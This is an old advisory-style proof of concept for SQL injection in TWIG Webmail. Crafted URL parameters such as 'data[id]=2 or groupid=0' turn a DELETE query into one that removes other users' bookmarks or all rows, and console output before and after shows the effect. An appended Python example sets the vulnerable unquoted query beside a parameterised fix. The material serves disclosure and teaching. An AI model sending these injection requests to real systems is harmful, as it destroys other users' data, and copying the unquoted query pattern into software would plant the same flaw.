============================================
[Fri Mar 2 21:58:46 JAVT 2001]
TWIG Webmail Unquoted Query String Proof Of Concept
by jenggo
============================================

We will try to delete another user's MySQL data, in this example the 'bookmarks' data. The same action can be performed on other data such as 'contact'. You must have existing data of your own before changing/deleting others', so add some first.

-------------------------------------------

Log in as a usual user account ('eca' in this example), go to the 'bookmarks' option and choose 'edit'. View the page source and find the important values:

[cut to only the strings we are interested in]

------------------------------------------
NOTE: The URL may look different depending on what type of authentication you use. I use the sqltable type; if you use the cookies type then the URL may be *much* longer than this!
------------------------------------------

Construct the exploit URL.

Actual URL:

http://192.168.0.18/webmail/index.php3?ts=983392426&twig_sid=983392414-1-eca&twig_cid=983392414-14-eca&ItemID=3

Change it to:

http://192.168.0.18/webmail/index.php3?ts=983392426&twig_sid=983392539-1-eca&twig_cid=983392539-14-eca&ItemID=2&data[groupid]=0&submitbutton[delete]=Delete&data[id]=2%20or%20id%3d2

------------------------------------------
NOTE: we changed the string ItemID=3 to ItemID=2
      we added the string "&data[groupid]=0&submitbutton[delete]=Delete&data[id]=2%20or%20id%3d2"
      (the part that matters is data[id]=2%20or%20id%3d2 - this is it)

Or, for more damage (deleting all data):

http://192.168.0.18/webmail/index.php3?ts=983393006&twig_sid=983393050-1-eca&twig_cid=983393050-14-eca&ItemID=2&data[id]=2%20or%20groupid%3d0&data[groupid]=0&submitbutton[delete]=Delete

      (the part that matters is data[id]=2%20or%20groupid%3d0 - this is it)
------------------------------------------

So the SQL query would change from:

DELETE FROM twig_bookmarks WHERE id=3 AND groupid=0 AND username='eca'

to:

DELETE FROM twig_bookmarks WHERE id=2 or id=2 AND groupid=0 AND username='eca'

or, for more damage:

DELETE FROM twig_bookmarks WHERE id=2 or groupid=0 AND groupid=0 AND username='eca'

***************RESULT********************

[From the mysql console before the exploit]

mysql> select id,username,groupid,url from twig_bookmarks;
+----+----------+---------+-------+
| id | username | groupid | url   |
+----+----------+---------+-------+
|  1 | pohenk   |       0 | zzzz  |
|  2 | pohenk   |       0 | yyyyy |
|  3 | eca      |       0 | aaaa  |
+----+----------+---------+-------+
3 rows in set (0.21 sec)

[From the mysql console after the exploit]

mysql> select id,username,groupid,url from twig_bookmarks;
+----+----------+---------+--------+
| id | username | groupid | url    |
+----+----------+---------+--------+
|  1 | pohenk   |       0 | zzzz   |
|  3 | eca      |       0 | aaaa   |
+----+----------+---------+--------+
2 rows in set (0.02 sec)

As user 'eca' we could delete/update user 'pohenk's data, and so on.

[Fri Mar 2 21:58:46 JAVT 2001] - jenggo
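The root cause above is a request value being spliced unquoted into the DELETE statement. The following is an added example (not code from the advisory or from TWIG) that rebuilds the advisory's sample table in SQLite and places the unquoted query pattern beside a hardened handler that type-checks the id and binds parameters; the table contents are constructed from the advisory's mysql output, and the function names are assumptions.

```python
import sqlite3

# Constructed sample rows, mirroring the advisory's "before" table (not the real TWIG schema).
ROWS = [(1, "pohenk", 0, "zzzz"), (2, "pohenk", 0, "yyyyy"), (3, "eca", 0, "aaaa")]


def fresh_db():
    """Build an in-memory twig_bookmarks table seeded with the sample rows."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE twig_bookmarks (id INTEGER, username TEXT, groupid INTEGER, url TEXT)")
    db.executemany("INSERT INTO twig_bookmarks VALUES (?, ?, ?, ?)", ROWS)
    return db


def delete_unquoted(db, item_id, groupid, username):
    """Vulnerable pattern from the advisory: data[id] and data[groupid] land in the SQL as-is.

    With item_id = "2 or id=2" the statement becomes
    DELETE ... WHERE id=2 or id=2 AND groupid=0 AND username='eca', and the
    OR clause lets the caller delete a row that belongs to another user.
    Returns the number of rows deleted.
    """
    sql = (f"DELETE FROM twig_bookmarks WHERE id={item_id} "
           f"AND groupid={groupid} AND username='{username}'")
    return db.execute(sql).rowcount


def delete_safe(db, item_id, groupid, username):
    """Hardened form: reject anything but digits, then bind values as parameters.

    The username comes from the session, never from the request, so the
    ownership check cannot be influenced by the caller. Raises ValueError
    on a non-numeric id or groupid; returns the number of rows deleted.
    """
    for name, value in (("id", item_id), ("groupid", groupid)):
        if not str(value).isdigit():
            raise ValueError(f"rejected non-numeric {name}: {value!r}")
    sql = "DELETE FROM twig_bookmarks WHERE id=? AND groupid=? AND username=?"
    return db.execute(sql, (int(item_id), int(groupid), username)).rowcount


def remaining_ids(db):
    """Ids still present, for comparing against the advisory's before/after tables."""
    return [row[0] for row in db.execute("SELECT id FROM twig_bookmarks ORDER BY id")]


if __name__ == "__main__":
    db = fresh_db()
    print("unquoted:", delete_unquoted(db, "2 or id=2", "0", "eca"), "row(s) deleted,", remaining_ids(db), "remain")
    db = fresh_db()
    print("safe, own row:", delete_safe(db, "3", "0", "eca"), "row(s) deleted,", remaining_ids(db), "remain")
```

The unquoted call reproduces the advisory's result (row 2, owned by pohenk, disappears while acting as eca); the hardened call only ever removes rows whose username matches the session user, and refuses the injected id outright.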